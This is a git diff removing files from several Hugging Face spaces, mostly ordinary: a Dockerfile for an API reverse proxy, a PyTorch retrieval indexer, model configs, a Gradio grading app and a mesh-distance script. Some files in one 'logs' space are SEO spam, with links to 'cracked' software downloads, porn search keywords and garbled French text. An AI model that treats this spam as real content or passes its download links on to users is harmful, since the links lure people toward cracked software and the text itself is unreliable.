        diff --git a/spaces/reddysh/pls/Dockerfile b/spaces/reddysh/pls/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/reddysh/pls/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py b/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py deleted file mode 100644 index 8fb49bcaedf3f81c906c59dc23e7f8e0472a8598..0000000000000000000000000000000000000000 --- a/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py +++ /dev/null @@ -1,287 +0,0 @@ -import contextlib -import logging -import os -from typing import Callable, List, Optional, Tuple, Union - -import torch -from torch.utils.data import DataLoader -from tqdm import tqdm - -from relik.common.log import get_logger -from relik.retriever.common.model_inputs import ModelInputs -from relik.retriever.data.base.datasets import BaseDataset -from relik.retriever.data.labels import Labels -from relik.retriever.indexers.base import BaseDocumentIndex -from relik.retriever.pytorch_modules import PRECISION_MAP, RetrievedSample - -logger = get_logger(__name__, level=logging.INFO) - - -class InMemoryDocumentIndex(BaseDocumentIndex): - DOCUMENTS_FILE_NAME = "documents.json" - EMBEDDINGS_FILE_NAME = "embeddings.pt" - - def __init__( - self, - documents: Union[str, List[str], Labels, os.PathLike, List[os.PathLike]] = None, - embeddings: Optional[torch.Tensor] = None, - device: str = "cpu", - precision: Optional[str] = None, - name_or_dir: Optional[Union[str, os.PathLike]] = None, - *args, - **kwargs, - ) -> None: - """ - An in-memory indexer. - - Args: - documents (:obj:`Union[List[str], PassageManager]`): - The documents to be indexed. - embeddings (:obj:`Optional[torch.Tensor]`, `optional`, defaults to :obj:`None`): - The embeddings of the documents. - device (:obj:`str`, `optional`, defaults to "cpu"): - The device to be used for storing the embeddings. - """ - - super().__init__(documents, embeddings, name_or_dir) - - if embeddings is not None and documents is not None: - logger.info("Both documents and embeddings are provided.") - if documents.get_label_size() != embeddings.shape[0]: - raise ValueError( - "The number of documents and embeddings must be the same." - ) - - # embeddings of the documents - self.embeddings = embeddings - # does this do anything? - del embeddings - # convert the embeddings to the desired precision - if precision is not None: - if ( - self.embeddings is not None - and self.embeddings.dtype != PRECISION_MAP[precision] - ): - logger.info( - f"Index vectors are of type {self.embeddings.dtype}. " - f"Converting to {PRECISION_MAP[precision]}." - ) - self.embeddings = self.embeddings.to(PRECISION_MAP[precision]) - else: - if ( - device == "cpu" - and self.embeddings is not None - and self.embeddings.dtype != torch.float32 - ): - logger.info( - "Index vectors are of type {}. 
Converting to float32.".format( - self.embeddings.dtype - ) - ) - self.embeddings = self.embeddings.to(PRECISION_MAP[32]) - # move the embeddings to the desired device - if self.embeddings is not None and not self.embeddings.device == device: - self.embeddings = self.embeddings.to(device) - - # device to store the embeddings - self.device = device - # precision to be used for the embeddings - self.precision = precision - - @torch.no_grad() - @torch.inference_mode() - def index( - self, - retriever, - documents: Optional[List[str]] = None, - batch_size: int = 32, - num_workers: int = 4, - max_length: Optional[int] = None, - collate_fn: Optional[Callable] = None, - encoder_precision: Optional[Union[str, int]] = None, - compute_on_cpu: bool = False, - force_reindex: bool = False, - add_to_existing_index: bool = False, - ) -> "InMemoryDocumentIndex": - """ - Index the documents using the encoder. - - Args: - retriever (:obj:`torch.nn.Module`): - The encoder to be used for indexing. - documents (:obj:`List[str]`, `optional`, defaults to :obj:`None`): - The documents to be indexed. - batch_size (:obj:`int`, `optional`, defaults to 32): - The batch size to be used for indexing. - num_workers (:obj:`int`, `optional`, defaults to 4): - The number of workers to be used for indexing. - max_length (:obj:`int`, `optional`, defaults to None): - The maximum length of the input to the encoder. - collate_fn (:obj:`Callable`, `optional`, defaults to None): - The collate function to be used for batching. - encoder_precision (:obj:`Union[str, int]`, `optional`, defaults to None): - The precision to be used for the encoder. - compute_on_cpu (:obj:`bool`, `optional`, defaults to False): - Whether to compute the embeddings on CPU. - force_reindex (:obj:`bool`, `optional`, defaults to False): - Whether to force reindexing. - add_to_existing_index (:obj:`bool`, `optional`, defaults to False): - Whether to add the new documents to the existing index. - - Returns: - :obj:`InMemoryIndexer`: The indexer object. - """ - - if documents is None and self.documents is None: - raise ValueError("Documents must be provided.") - - if self.embeddings is not None and not force_reindex: - logger.info( - "Embeddings are already present and `force_reindex` is `False`. Skipping indexing." 
- ) - if documents is None: - return self - - if collate_fn is None: - tokenizer = retriever.passage_tokenizer - - def collate_fn(x): - return ModelInputs( - tokenizer( - x, - padding=True, - return_tensors="pt", - truncation=True, - max_length=max_length or tokenizer.model_max_length, - ) - ) - - if force_reindex: - if documents is not None: - self.documents.add_labels(documents) - data = [k for k in self.documents.get_labels()] - - else: - if documents is not None: - data = [k for k in Labels(documents).get_labels()] - else: - return self - - # if force_reindex: - # data = [k for k in self.documents.get_labels()] - - dataloader = DataLoader( - BaseDataset(name="passage", data=data), - batch_size=batch_size, - shuffle=False, - num_workers=num_workers, - pin_memory=False, - collate_fn=collate_fn, - ) - - encoder = retriever.passage_encoder - - # Create empty lists to store the passage embeddings and passage index - passage_embeddings: List[torch.Tensor] = [] - - encoder_device = "cpu" if compute_on_cpu else self.device - - # fucking autocast only wants pure strings like 'cpu' or 'cuda' - # we need to convert the model device to that - device_type_for_autocast = str(encoder_device).split(":")[0] - # autocast doesn't work with CPU and stuff different from bfloat16 - autocast_pssg_mngr = ( - contextlib.nullcontext() - if device_type_for_autocast == "cpu" - else ( - torch.autocast( - device_type=device_type_for_autocast, - dtype=PRECISION_MAP[encoder_precision], - ) - ) - ) - with autocast_pssg_mngr: - # Iterate through each batch in the dataloader - for batch in tqdm(dataloader, desc="Indexing"): - # Move the batch to the device - batch: ModelInputs = batch.to(encoder_device) - # Compute the passage embeddings - passage_outs = encoder(**batch).pooler_output - # Append the passage embeddings to the list - if self.device == "cpu": - passage_embeddings.extend([c.detach().cpu() for c in passage_outs]) - else: - passage_embeddings.extend([c for c in passage_outs]) - - # move the passage embeddings to the CPU if not already done - # the move to cpu and then to gpu is needed to avoid OOM when using mixed precision - if not self.device == "cpu": # this if is to avoid unnecessary moves - passage_embeddings = [c.detach().cpu() for c in passage_embeddings] - # stack it - passage_embeddings: torch.Tensor = torch.stack(passage_embeddings, dim=0) - # move the passage embeddings to the gpu if needed - if not self.device == "cpu": - passage_embeddings = passage_embeddings.to(PRECISION_MAP[self.precision]) - passage_embeddings = passage_embeddings.to(self.device) - self.embeddings = passage_embeddings - - # free up memory from the unused variable - del passage_embeddings - - return self - - @torch.no_grad() - @torch.inference_mode() - def search(self, query: torch.Tensor, k: int = 1) -> list[list[RetrievedSample]]: - """ - Search the documents using the query. - - Args: - query (:obj:`torch.Tensor`): - The query to be used for searching. - k (:obj:`int`, `optional`, defaults to 1): - The number of documents to be retrieved. - - Returns: - :obj:`List[RetrievedSample]`: The retrieved documents. 
- """ - # fucking autocast only wants pure strings like 'cpu' or 'cuda' - # we need to convert the model device to that - device_type_for_autocast = str(self.device).split(":")[0] - # autocast doesn't work with CPU and stuff different from bfloat16 - autocast_pssg_mngr = ( - contextlib.nullcontext() - if device_type_for_autocast == "cpu" - else ( - torch.autocast( - device_type=device_type_for_autocast, - dtype=self.embeddings.dtype, - ) - ) - ) - with autocast_pssg_mngr: - similarity = torch.matmul(query, self.embeddings.T) - # Retrieve the indices of the top k passage embeddings - retriever_out: Tuple = torch.topk( - similarity, k=min(k, similarity.shape[-1]), dim=1 - ) - # get int values - batch_top_k: List[List[int]] = retriever_out.indices.detach().cpu().tolist() - # get float values - batch_scores: List[List[float]] = retriever_out.values.detach().cpu().tolist() - # Retrieve the passages corresponding to the indices - batch_passages = [ - [self.documents.get_label_from_index(i) for i in indices] - for indices in batch_top_k - ] - # build the output object - batch_retrieved_samples = [ - [ - RetrievedSample(label=passage, index=index, score=score) - for passage, index, score in zip(passages, indices, scores) - ] - for passages, indices, scores in zip( - batch_passages, batch_top_k, batch_scores - ) - ] - return batch_retrieved_samples diff --git a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py b/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py deleted file mode 100644 index 19b88e66f1c8da2f0f32166f2d34d765ba46c82f..0000000000000000000000000000000000000000 --- a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py +++ /dev/null @@ -1,103 +0,0 @@ -model = dict( - type='IRRPWC', - encoder=dict( - type='PWCNetEncoder', - in_channels=3, - net_type='Small', - pyramid_levels=[ - 'level1', 'level2', 'level3', 'level4', 'level5', 'level6' - ], - out_channels=(16, 32, 64, 96, 128, 196), - strides=(2, 2, 2, 2, 2, 2), - dilations=(1, 1, 1, 1, 1, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - decoder=dict( - type='IRRPWCDecoder', - flow_levels=[ - 'level0', 'level1', 'level2', 'level3', 'level4', 'level5', - 'level6' - ], - corr_in_channels=dict( - level2=32, level3=64, level4=96, level5=128, level6=196), - corr_feat_channels=32, - flow_decoder_in_channels=115, - occ_decoder_in_channels=114, - corr_cfg=dict(type='Correlation', max_displacement=4), - scaled=True, - warp_cfg=dict(type='Warp', align_corners=True), - densefeat_channels=(128, 128, 96, 64, 32), - flow_post_processor=dict( - type='ContextNet', - in_channels=565, - out_channels=2, - feat_channels=(128, 128, 128, 96, 64, 32), - dilations=(1, 2, 4, 8, 16, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - flow_refine=dict( - type='FlowRefine', - in_channels=35, - feat_channels=(128, 128, 64, 64, 32, 32), - patch_size=3, - warp_cfg=dict(type='Warp', align_corners=True, use_mask=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - ), - occ_post_processor=dict( - type='ContextNet', - in_channels=563, - out_channels=1, - feat_channels=(128, 128, 128, 96, 64, 32), - dilations=(1, 2, 4, 8, 16, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - occ_refine=dict( - type='OccRefine', - in_channels=65, - feat_channels=(128, 128, 64, 64, 32, 32), - patch_size=3, - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - warp_cfg=dict(type='Warp', align_corners=True), - ), - occ_upsample=dict( - 
type='OccShuffleUpsample', - in_channels=11, - feat_channels=32, - infeat_channels=16, - out_channels=1, - warp_cfg=dict(type='Warp', align_corners=True, use_mask=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - ), - occ_refined_levels=['level0', 'level1'], - flow_div=20., - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - flow_loss=dict( - type='MultiLevelEPE', - weights=dict( - level6=0.32, - level5=0.08, - level4=0.02, - level3=0.01, - level2=0.005, - level1=0.00125, - level0=0.0003125), - p=2, - reduction='sum'), - occ_loss=dict( - type='MultiLevelBCE', - weights=dict( - level6=0.32, - level5=0.08, - level4=0.02, - level3=0.01, - level2=0.005, - level1=0.00125, - level0=0.0003125), - reduction='sum'), - ), - init_cfg=dict( - type='Kaiming', - a=0.1, - nonlinearity='leaky_relu', - layer=['Conv2d', 'ConvTranspose2d'], - mode='fan_in', - bias=0), - train_cfg=dict(), - test_cfg=dict()) diff --git a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py b/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py deleted file mode 100644 index 1e8f90c4b69ca0d19e7d972f8c3fdfab4573f823..0000000000000000000000000000000000000000 --- a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py +++ /dev/null @@ -1,48 +0,0 @@ -model = dict( - type='RAFT', - num_levels=4, - radius=4, - cxt_channels=128, - h_channels=128, - encoder=dict( - type='RAFTEncoder', - in_channels=3, - out_channels=256, - net_type='Basic', - norm_cfg=dict(type='IN'), - init_cfg=[ - dict( - type='Kaiming', - layer=['Conv2d'], - mode='fan_out', - nonlinearity='relu'), - dict(type='Constant', layer=['InstanceNorm2d'], val=1, bias=0) - ]), - cxt_encoder=dict( - type='RAFTEncoder', - in_channels=3, - out_channels=256, - net_type='Basic', - norm_cfg=dict(type='SyncBN'), - init_cfg=[ - dict( - type='Kaiming', - layer=['Conv2d'], - mode='fan_out', - nonlinearity='relu'), - dict(type='Constant', layer=['SyncBatchNorm2d'], val=1, bias=0) - ]), - decoder=dict( - type='RAFTDecoder', - net_type='Basic', - num_levels=4, - radius=4, - iters=12, - corr_op_cfg=dict(type='CorrLookup', align_corners=True), - gru_type='SeqConv', - flow_loss=dict(type='SequenceLoss'), - act_cfg=dict(type='ReLU')), - freeze_bn=False, - train_cfg=dict(), - test_cfg=dict(), -) diff --git a/spaces/riffusion/riffusion-playground/README.md b/spaces/riffusion/riffusion-playground/README.md deleted file mode 100644 index 5f5a28a28446a619447a2401474b528b85c7a5e2..0000000000000000000000000000000000000000 --- a/spaces/riffusion/riffusion-playground/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Riffusion Playground -emoji: 📚 -colorFrom: red -colorTo: purple -sdk: streamlit -sdk_version: 1.15.2 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py deleted file mode 100644 index c68489f9c22e112ceae9c265e916cc3c1a6ae301..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py +++ /dev/null @@ -1,27 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-from ..builder import DETECTORS -from .two_stage import TwoStageDetector - - -@DETECTORS.register_module() -class MaskRCNN(TwoStageDetector): - """Implementation of `Mask R-CNN `_""" - - def __init__(self, - backbone, - rpn_head, - roi_head, - train_cfg, - test_cfg, - neck=None, - pretrained=None, - init_cfg=None): - super(MaskRCNN, self).__init__( - backbone=backbone, - neck=neck, - rpn_head=rpn_head, - roi_head=roi_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - pretrained=pretrained, - init_cfg=init_cfg) diff --git a/spaces/rohan13/grady/app.py b/spaces/rohan13/grady/app.py deleted file mode 100644 index f88c69036aac17116bef966284f20204ae8f5081..0000000000000000000000000000000000000000 --- a/spaces/rohan13/grady/app.py +++ /dev/null @@ -1,117 +0,0 @@ -import gradio as gr -from main import index, run -from gtts import gTTS -import os, time - -from transformers import pipeline - -p = pipeline("automatic-speech-recognition") - -"""Use text to call chat method from main.py""" - -models = ["GPT-3.5", "Flan UL2", "GPT-4", "Flan T5"] - -def add_text(history, text, model): - print("Question asked: " + text) - response = run_model(text, model) - history = history + [(text, response)] - print(history) - return history, "" - - -def run_model(text, model): - start_time = time.time() - print("start time:" + str(start_time)) - response = run(text, model) - end_time = time.time() - # If response contains string `SOURCES:`, then add a \n before `SOURCES` - if "SOURCES:" in response: - response = response.replace("SOURCES:", "\nSOURCES:") - # response = response + "\n\n" + "Time taken: " + str(end_time - start_time) - print(response) - print("Time taken: " + str(end_time - start_time)) - return response - - - -def get_output(history, audio, model): - - txt = p(audio)["text"] - # history.append(( (audio, ) , txt)) - audio_path = 'response.wav' - response = run_model(txt, model) - # Remove all text from SOURCES: to the end of the string - trimmed_response = response.split("SOURCES:")[0] - myobj = gTTS(text=trimmed_response, lang='en', slow=False) - myobj.save(audio_path) - # split audio by / and keep the last element - # audio = audio.split("/")[-1] - # audio = audio + ".wav" - history.append(( (audio, ) , (audio_path, ))) - print(history) - return history - -def set_model(history, model): - print("Model selected: " + model) - history = get_first_message(history) - index(model) - return history - - -def get_first_message(history): - history = [(None, - '''Hi!! I AM GRADY!! I am a grading assistant to help you grade assignments based on a rubric!!
        - Today, I will be grading Paediatric Orthopaedic Quiz.
        - Use the format as given in the example below to get an accurate grade.
        - WARNING! I might get things wrong, so double check before your final grading. All the best. ''')] - return history - - -def bot(history): - return history - -with gr.Blocks() as demo: - gr.HTML("

        Grady - Your helpful Grading Assistant

        ") - chatbot = gr.Chatbot(get_first_message([]), elem_id="chatbot", interactive=True).style(height=500) - - with gr.Row(): - # Create radio button to select model - radio = gr.Radio(models, label="Choose a model", value="GPT-3.5", type="value", visible=False) - with gr.Row(): - with gr.Column(scale=0.75): - txt = gr.Textbox( - label="Student Response", - placeholder="Enter text and press enter", lines=1, interactive=True - ).style(container=False) - - with gr.Column(scale=0.25): - audio = gr.Audio(source="microphone", type="filepath").style(container=False) - with gr.Row(): - gr.Examples(examples=["""11: Currently the process is not very efficient as each patient goes through the same steps at the front desk and the radiology department although the sub-activities and processes are different. Also, the staff is doing multiple activities based on patient requirements.  - -One solution is to have a streamlined and differentiated process for each sub-type with dedicated staff. For example, at the front desk, all new patient cases can be handled by one nurse while all follow-up cases by a second nurse. - -Similarly, in the radiology department, all upper extremity cases can be handled by 2 technicians while lower extremity cases by the other 2 technicians with dedicated X-ray machines. The 3rd nurse will be responsible for handling the hand-off of X-rays and inserting them into the patient's files.  - -By having staff do a single type of task on a particular day, and by having the patients go through differentiated workflows, it should be possible to improve overall efficiency. """], inputs=[txt], label="Answers") - - txt.submit(add_text, [chatbot, txt, radio], [chatbot, txt], postprocess=False).then( - bot, chatbot, chatbot - ) - - audio.change(fn=get_output, inputs=[chatbot, audio, radio], outputs=[chatbot]).then( - bot, chatbot, chatbot - ) - - radio.change(fn=set_model, inputs=[chatbot, radio], outputs=[chatbot]).then(bot, chatbot, chatbot) - - audio.change(lambda:None, None, audio) - - set_model(chatbot, radio.value) - - - -if __name__ == "__main__": - demo.queue() - demo.queue(concurrency_count=5) - demo.launch(debug=True) diff --git a/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md b/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md deleted file mode 100644 index cab2db210499a14e1dae05876a8ab10cc7dfa035..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Background Remover v1 0 for Adobe Photoshop Cracked SSG


        Download Ziphttps://tinurll.com/2uzogv



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md b/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md deleted file mode 100644 index d754a78e6bfe0328dc1d2c1464648d3e0f2e451f..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

        cocutprofessional2011crack


        Download File » https://tinurll.com/2uzmYj



        - - 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md b/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md deleted file mode 100644 index a8633fc32d3e2f9980631ee2ea0de2a50ef2d11f..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Download Java Game Untuk Hp Cross G10t Terbaru berserk ricerca winf


        DOWNLOAD ->->->-> https://tinurll.com/2uzmjZ



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md b/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md deleted file mode 100644 index 8e42362ff830715e25bfc0072e26d251fe8a5537..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md +++ /dev/null @@ -1,10 +0,0 @@ - -

The fully equipped and optimized units of the CN C and DN C series are even more compact, more energy-efficient and easier to maintain. They deliver discharge pressures of 10 to 45 bar.

        -

It broadcasts in French, English, Arabic and Spanish[1] over DTT, satellite, cable, IP television and the web. It is also available in hotels, airlines and airports, and its programmes are partially carried by foreign television channels. Available in more than 355 million households across more than 180 countries, France 24 was watched by 55 million viewers each week in 2018, while its website receives an average of more than 18 million visitors per month. The news channel France Info carries its programmes from midnight to 6:30 a.m. on weekdays and from midnight to 6 a.m. on weekends.

        -

        Entretien D Embauche En Anglais Pdf 24l


        DOWNLOADhttps://tinurll.com/2uzlWG



        -

France 24 began broadcasting on 5 December 2006 at 8:29 p.m., initially only via Internet streaming, then from 6 December at the same time on cable, satellite and ADSL. It broadcast in French and English, in Europe, Africa, the Near and Middle East, and in the cities of New York and Washington, reaching nearly 75 million households in more than 90 countries[24],[25],[26].

        -

On its three channels (French, English, Arabic), the station offers a full international news update every hour (repeated on the half hour), with a live 10- or 15-minute bulletin preceded by a world weather report. Three news blocks called Paris Direct air each weekday, from 6 a.m. to 10 a.m. (fr+en), from 1 p.m. to 3 p.m. (fr+ar+en), and from 6 p.m. to midnight (ar+en+fr). They cover the news continuously with headlines every quarter hour, French and international press reviews, and cultural, economic and sports segments[78].

        -

France 24 uses several means to transmit its programmes around the world: DTT, satellite, cable, streaming on PC and mobile (including mobile apps), IP television and OTT. In addition, the channel is carried in hotels and is partially rebroadcast by foreign television channels. It broadcasts in 4 languages: French, English, Arabic[82],[83] and Spanish.

        -

The channel has broadcast in French and English since 5 December 2006 at 8:29 p.m., at first only via Internet streaming, then from 6 December at the same time on cable, satellite and ADSL[24],[25],[26]. On 2 April 2007 it launched its Arabic-language channel with four hours per day[28], then ten hours from 27 April 2009[38], before going 24/7 on 12 October 2010[39]. Since 9 January 2011 it has been broadcast entirely in 16:9 format, compared with 4:3 previously[85],[86]. In September 2014 the channel inaugurated its new high-definition studios and control rooms[78]. It launched a new Spanish-language channel aimed mainly at Latin America in September 2017[61].

        aaccfb2cb3
        -
        -
        \ No newline at end of file diff --git a/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md b/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md deleted file mode 100644 index a3d29aa36754f7961052c51bdb900f5a9bf94063..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md +++ /dev/null @@ -1,5 +0,0 @@ -
        -

        Search foster home for imaginary friends porn Photos
        Search foster home for imaginary friends porn XXX Videos
        Search foster home for imaginary friends porn HD Videos
        Search foster home for imaginary friends porn Indian Videos
        Search foster home for imaginary friends porn MP4 Videos
        Search foster home for imaginary friends porn Indian Images
        Search foster home for imaginary friends porn Leaked Videos
        Search foster home for imaginary friends porn Leaked Pics
        Search foster home for imaginary friends porn XXX Posts

        -

        foster homes for imaginary friends porn


        Download ❤❤❤ https://tinurll.com/2uzlyc



        aaccfb2cb3
        -
        -
        \ No newline at end of file diff --git a/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py b/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py deleted file mode 100644 index b513b52267f7bf5aae09282c15b0a2e20c8a8fee..0000000000000000000000000000000000000000 --- a/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py +++ /dev/null @@ -1,56 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Utility to export a training checkpoint to a lightweight release checkpoint. -""" - -from pathlib import Path -import typing as tp - -from omegaconf import OmegaConf, DictConfig -import torch - - -def _clean_lm_cfg(cfg: DictConfig): - OmegaConf.set_struct(cfg, False) - # This used to be set automatically in the LM solver, need a more robust solution - # for the future. - cfg['transformer_lm']['card'] = 2048 - cfg['transformer_lm']['n_q'] = 4 - # Experimental params no longer supported. - bad_params = ['spectral_norm_attn_iters', 'spectral_norm_ff_iters', - 'residual_balancer_attn', 'residual_balancer_ff', 'layer_drop'] - for name in bad_params: - del cfg['transformer_lm'][name] - OmegaConf.set_struct(cfg, True) - return cfg - - -def export_encodec(checkpoint_path: tp.Union[Path, str], out_folder: tp.Union[Path, str]): - sig = Path(checkpoint_path).parent.name - assert len(sig) == 8, "Not a valid Dora signature" - pkg = torch.load(checkpoint_path, 'cpu') - new_pkg = { - 'best_state': pkg['ema']['state']['model'], - 'xp.cfg': OmegaConf.to_yaml(pkg['xp.cfg']), - } - out_file = Path(out_folder) / f'{sig}.th' - torch.save(new_pkg, out_file) - return out_file - - -def export_lm(checkpoint_path: tp.Union[Path, str], out_folder: tp.Union[Path, str]): - sig = Path(checkpoint_path).parent.name - assert len(sig) == 8, "Not a valid Dora signature" - pkg = torch.load(checkpoint_path, 'cpu') - new_pkg = { - 'best_state': pkg['fsdp_best_state']['model'], - 'xp.cfg': OmegaConf.to_yaml(_clean_lm_cfg(pkg['xp.cfg'])) - } - out_file = Path(out_folder) / f'{sig}.th' - torch.save(new_pkg, out_file) - return out_file diff --git a/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py b/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py deleted file mode 100644 index 9518dcec3d5274f69f6b5880584bbdc36e58cd22..0000000000000000000000000000000000000000 --- a/spaces/runa91/bite_gradio/src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py +++ /dev/null @@ -1,213 +0,0 @@ - -""" -code adapted from: https://github.com/mikedh/trimesh/blob/main/examples/shortest.py -shortest.py ----------------- -Given a mesh and two vertex indices find the shortest path -between the two vertices while only traveling along edges -of the mesh. 
-""" - -# python src/graph_networks/losses_for_vertex_wise_predictions/calculate_distance_between_points_on_mesh_forfourpaws.py - - -import os -import sys -import glob -import csv -import json -import shutil -import tqdm -import numpy as np -import pickle as pkl -import trimesh -import networkx as nx - - - - - -def read_csv(csv_file): - with open(csv_file,'r') as f: - reader = csv.reader(f) - headers = next(reader) - row_list = [{h:x for (h,x) in zip(headers,row)} for row in reader] - return row_list - - -def load_all_template_mesh_distances(root_out_path, filename='all_vertex_distances.npy'): - vert_dists = np.load(root_out_path + filename) - return vert_dists - - -def prepare_graph_from_template_mesh_and_calculate_all_distances(path_mesh, root_out_path, calc_dist_mat=False): - # root_out_path = ROOT_OUT_PATH - ''' - from smal_pytorch.smal_model.smal_torch_new import SMAL - smal = SMAL() - verts = smal.v_template.detach().cpu().numpy() - faces = smal.faces.detach().cpu().numpy() - ''' - # path_mesh = ROOT_PATH_MESH + 'mesh_downsampling_meshesmy_smpl_39dogsnorm_Jr_4_dog_template_downsampled0.obj' - my_mesh = trimesh.load_mesh(path_mesh, process=False, maintain_order=True) - verts = my_mesh.vertices - faces = my_mesh.faces - # edges without duplication - edges = my_mesh.edges_unique - # the actual length of each unique edge - length = my_mesh.edges_unique_length - # create the graph with edge attributes for length (option A) - # g = nx.Graph() - # for edge, L in zip(edges, length): g.add_edge(*edge, length=L) - # you can create the graph with from_edgelist and - # a list comprehension (option B) - ga = nx.from_edgelist([(e[0], e[1], {'length': L}) for e, L in zip(edges, length)]) - # calculate the distances between all vertex pairs - if calc_dist_mat: - # calculate distances between all possible vertex pairs - # shortest_path = nx.shortest_path(ga, source=ind_v0, target=ind_v1, weight='length') - # shortest_dist = nx.shortest_path_length(ga, source=ind_v0, target=ind_v1, weight='length') - dis = dict(nx.shortest_path_length(ga, weight='length', method='dijkstra')) - vertex_distances = np.zeros((n_verts_smal, n_verts_smal)) - for ind_v0 in range(n_verts_smal): - print(ind_v0) - for ind_v1 in range(ind_v0, n_verts_smal): - vertex_distances[ind_v0, ind_v1] = dis[ind_v0][ind_v1] - vertex_distances[ind_v1, ind_v0] = dis[ind_v0][ind_v1] - # save those distances - np.save(root_out_path + 'all_vertex_distances.npy', vertex_distances) - vert_dists = vertex_distances - else: - vert_dists = np.load(root_out_path + 'all_vertex_distances.npy') - return ga, vert_dists - - -def calculate_vertex_overview_for_gc_annotation(name, gc_info_raw, vert_dists, root_out_path_vis=None, verts=None, faces=None, img_v12_dir=None): - # input: - # root_out_path_vis = ROOT_OUT_PATH - # img_v12_dir = IMG_V12_DIR - # name = images_with_gc_labelled[ind_img] - # gc_info_raw = gc_dict['bite/' + name] - # output: - # vertex_overview: np array of shape (n_verts_smal, 3) with [first: no-contact=0 contact=1 second: index of vertex third: dist] - n_verts_smal = 3889 - gc_vertices = [] - gc_info_np = np.zeros((n_verts_smal)) - for ind_v in gc_info_raw: - if ind_v < n_verts_smal: - gc_vertices.append(ind_v) - gc_info_np[ind_v] = 1 - # save a visualization of those annotations - if root_out_path_vis is not None: - my_mesh = trimesh.Trimesh(vertices=verts, faces=faces, process=False, maintain_order=True) - if img_v12_dir is not None and root_out_path_vis is not None: - vert_colors = np.repeat(255*gc_info_np[:, None], 3, 1) - 
